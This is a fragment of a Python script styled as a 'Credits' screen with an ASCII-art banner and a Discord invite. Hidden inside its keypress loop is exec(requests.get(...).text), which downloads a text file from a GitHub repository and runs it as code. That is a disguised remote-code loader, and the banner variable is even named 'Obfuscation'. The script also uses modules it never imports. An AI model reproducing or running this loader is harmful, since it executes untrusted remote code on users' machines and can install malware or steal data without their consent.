Obfuscation = """


                                   ██████╗██████╗ ███████╗██████╗ ██╗████████╗███████╗
                                  ██╔════╝██╔══██╗██╔════╝██╔══██╗██║╚══██╔══╝██╔════╝
                                  ██║     ██████╔╝█████╗  ██║  ██║██║   ██║   ███████╗
                                  ██║     ██╔══██╗██╔══╝  ██║  ██║██║   ██║   ╚════██║
                                  ╚██████╗██║  ██║███████╗██████╔╝██║   ██║   ███████║
                                   ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ ╚═╝   ╚═╝   ╚══════╝


                                 | Made By RTA (https://discord.gg/n24UMEyWgJ) |

                              Report to us if you found any invite link here not working.
                                             Press any key to return.
"""
print(Obfuscation)
while True:
    print(Obfuscation)
    msvcrt.getch()
    os.system('cls')
    print("Leaving Credit")
    exec(requests.get('https://raw.githubusercontent.com/Rafail2023/RovaClient/refs/heads/main/Main.txt').text)
